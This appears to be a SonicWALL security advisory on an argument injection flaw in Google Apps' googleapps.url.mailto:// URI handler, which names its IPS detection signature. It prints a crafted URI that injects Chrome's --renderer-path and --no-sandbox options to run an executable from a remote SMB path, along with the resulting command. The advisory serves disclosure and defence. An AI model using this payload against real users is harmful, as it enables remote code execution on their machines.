Google Apps URI Argument Injection

Google Apps is a service from Google featuring several Web applications with similar functionality to traditional office suites, including: Gmail, Google Calendar, Talk, Docs and Sites. When Google Apps is installed, the application registers a handler for the googleapps.url.mailto:// URI scheme. Generic format of the scheme is as follows:

googleapps.url.mailto://

Google Apps supports multiple command-line options. One such argument, "--domain" causes Google Chrome to start and process the specified URL. Google Chrome also supports multiple command-line options. The "--no-sandbox" disables Google Chrome's security sandbox. The "--renderer-path" causes Google Chrome to execute the specified program, even from a SMB share.

There exists an argument injection vulnerability in Google Apps. Specifically, the vulnerability resides in processing a googleapps.url.mailto:// URI with double-quotes ("). By combining the "--domain", "--renderer-path" and "--no-sandbox" arguments, one can have Google Chrome executes arbitrary command. A generic example of such malicious URL looks like:

'googleapps.url.mailto://"%20--domain="--x%20--renderer-path=\HOSTPATHMALICIOUS.exe%20--no-sandbox%20--x"/'

which will execute the following command:

chrome.exe --renderer-path=\HOSTPATHMALICIOUS.exe --no-sandbox

Google Chrome will not ask user permission or notify the user of such commands. Remote attackers could exploit this vulnerability by enticing a target user to open a web page with a specially crafted googleapps.url.mailto:// URI. Successful exploitation would result in injection and execution of commands passed to the Google Chrome program. The vulnerability has been assigned as Bugtraq ID 36581. It affects Google Apps v1.1.110 6031 and prior.

SonicWALL has released an IPS signature to detect and block specific exploitation attempts targeting this vulnerability. The signature is listed below:

• 3174 - Google Apps URI Argument Injection